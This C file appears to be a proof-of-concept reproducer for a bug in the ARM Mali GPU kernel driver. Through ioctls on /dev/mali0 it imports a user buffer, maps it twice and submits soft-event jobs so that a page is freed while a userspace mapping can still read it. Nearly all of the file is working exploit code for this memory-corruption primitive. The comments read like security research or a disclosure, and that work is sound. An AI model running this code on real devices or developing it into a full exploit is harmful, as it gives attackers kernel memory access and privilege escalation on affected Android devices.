#define _GNU_SOURCE
#include <err.h>
#include <stdint.h>
#include <fcntl.h>
#include <string.h>
#include <assert.h>
#include <stdio.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t
typedef __u8 base_kcpu_queue_id;

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 0/*JM*/, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

union kbase_ioctl_mem_alloc {
        struct {
                __u64 va_pages;
                __u64 commit_pages;
                __u64 extension;
                __u64 flags;
        } in;
        struct {
                __u64 flags;
                __u64 gpu_va;
        } out;
};
#define KBASE_IOCTL_MEM_ALLOC \
        _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

#define BASE_MEM_CACHED_CPU (1<<12)
struct base_mem_import_user_buffer {
    __u64 ptr;
      __u64 length;
};
union kbase_ioctl_mem_import {
  struct {
    __u64 flags;
    __u64 phandle;
    __u32 type;
    __u32 padding;
  } in;
  struct {
    __u64 flags;
    __u64 gpu_va;
    __u64 va_pages;
  } out;
};
#define KBASE_IOCTL_MEM_IMPORT \
    _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)

struct base_jd_udata {
        __u64 blob[2];
};
typedef __u8 base_atom_id;
typedef __u8 base_jd_dep_type;
struct base_dependency {
        base_atom_id atom_id;
        base_jd_dep_type dependency_type;
};
typedef __u8 base_jd_prio;
typedef __u32 base_jd_core_req;
  #define BASE_JD_REQ_SOFT_JOB        ((base_jd_core_req)1 << 9)
  #define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
  #define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
  #define BASE_JD_REQ_EXTERNAL_RESOURCES   ((base_jd_core_req)1 << 8)
struct base_external_resource {
        __u64 ext_resource;
};
struct base_jd_fragment {
        __u64 norm_read_norm_write;
        __u64 norm_read_forced_write;
        __u64 forced_read_forced_write;
        __u64 forced_read_norm_write;
};
typedef struct base_jd_atom {
        __u64 seq_nr;
        __u64 jc;
        struct base_jd_udata udata;
        __u64 extres_list;
        __u16 nr_extres;
        __u8 jit_id[2];
        struct base_dependency pre_dep[2];
        base_atom_id atom_number;
        base_jd_prio prio;
        __u8 device_nr;
        __u8 jobslot;
        base_jd_core_req core_req;
        __u8 renderpass_id;
        __u8 padding[7];
} base_jd_atom;
struct kbase_ioctl_job_submit {
        __u64 addr;
        __u32 nr_atoms;
        __u32 stride;
};
#define KBASE_IOCTL_JOB_SUBMIT \
        _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)


static int setup_mali(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));
  struct kbase_ioctl_version_check vc = { .major = 11, .minor = 11 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
  SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED, mali_fd,
              BASE_MEM_MAP_TRACKING_HANDLE));
  return mali_fd;
}

static void *gpu_alloc(int mali_fd, int num_pages, uint64_t extra_flags) {
  union kbase_ioctl_mem_alloc ma = { .in = {
    .va_pages = num_pages,
    .commit_pages = num_pages,
    .flags = 0xf/*RW for CPU+GPU*/ | extra_flags
  }};
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &ma));
  assert(ma.out.flags & (1<<13)/*BASE_MEM_SAME_VA*/);
  void *gpu_va = SYSCHK(mmap(
      NULL, num_pages * 0x1000UL, PROT_READ|PROT_WRITE, MAP_SHARED, mali_fd,
      ma.out.gpu_va
  ));
  memset((void*)gpu_va, '\0', 0x1000);
  return gpu_va;
}

static void submit_atom(int mali_fd, int atom_number, base_jd_core_req core_req, void *jc, void *extres) {
  struct base_jd_atom atom = {
    .atom_number = atom_number,
    .core_req = (extres?BASE_JD_REQ_EXTERNAL_RESOURCES:0) | core_req,
    .nr_extres = extres ? 1 : 0,
    .extres_list = (unsigned long)extres,
    .jc = (unsigned long)jc
  };
  struct kbase_ioctl_job_submit js = {
    .addr = (unsigned long)&atom,
    .nr_atoms = 1,
    .stride = sizeof(atom)
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &js));
}

int main(void) {
  int mali_fd = setup_mali();

  char *anon_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  *(volatile char *)anon_mapping = 1;
  struct base_mem_import_user_buffer ubuf = {
    .ptr = (unsigned long)anon_mapping,
    .length = 0x1000
  };
  union kbase_ioctl_mem_import mi = {
    .in = {
      .flags = 0xf/*CPU+GPU R+W*/ | BASE_MEM_CACHED_CPU,
      .phandle = (unsigned long)&ubuf,
      .type = 3/*BASE_MEM_IMPORT_TYPE_USER_BUFFER*/
    }
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_IMPORT, &mi));
  printf("MEM_IMPORT result: flags = 0x%lx, gpu_va=0x%lx, va_pages=0x%lx\n",
        (unsigned long)mi.out.flags, (unsigned long)mi.out.gpu_va,
        (unsigned long)mi.out.va_pages);
  assert(mi.out.flags & (1<<14)/*BASE_MEM_NEED_MMAP*/);
  // initially in EMPTY state
  void *gpu_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_SHARED, mali_fd, mi.out.gpu_va));
  printf("actual host+gpu VA: %p\n", gpu_mapping);
  char *cpu_mapping2 = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                   MAP_SHARED, mali_fd, (off_t)gpu_mapping));
  printf("second host VA: %p\n", cpu_mapping2);

  // transition EMPTY -> GPU_MAPPED
  uint32_t *soft_event = gpu_alloc(mali_fd, 1, 0);
  struct base_external_resource extres = {.ext_resource = (size_t)gpu_mapping};
  submit_atom(mali_fd, 0, BASE_JD_REQ_SOFT_EVENT_WAIT, soft_event, &extres);

  hexdump(gpu_mapping, 0x1000);

  // populate PTE in cpu_mapping2
  // (if you remove this line, the reproducer will crash, showing that PTEs can
  // not be populated later on in EMPTY state)
  *(volatile char *)cpu_mapping2;

  // transition GPU_MAPPED -> PINNED
  // (if you remove this line, the reproducer will crash, showing that the
  // userspace mapping is zapped on the GPU_MAPPED -> EMPTY transition, but not
  // by the combination of GPU_MAPPED -> PINNED and PINNED -> EMPTY)
  submit_atom(mali_fd, 1, BASE_JD_REQ_SOFT_EVENT_SET, soft_event, NULL);

  // transition PINNED -> EMPTY
  munmap(gpu_mapping, 0x1000);

  // drop the original page reference from the anonymous VMA, and see if that
  // causes the page to be freed while we can still read it
  munmap(anon_mapping, 0x1000);
  printf("cpu_mapping2 dump:\n");
  hexdump(cpu_mapping2, 0x1000);
}
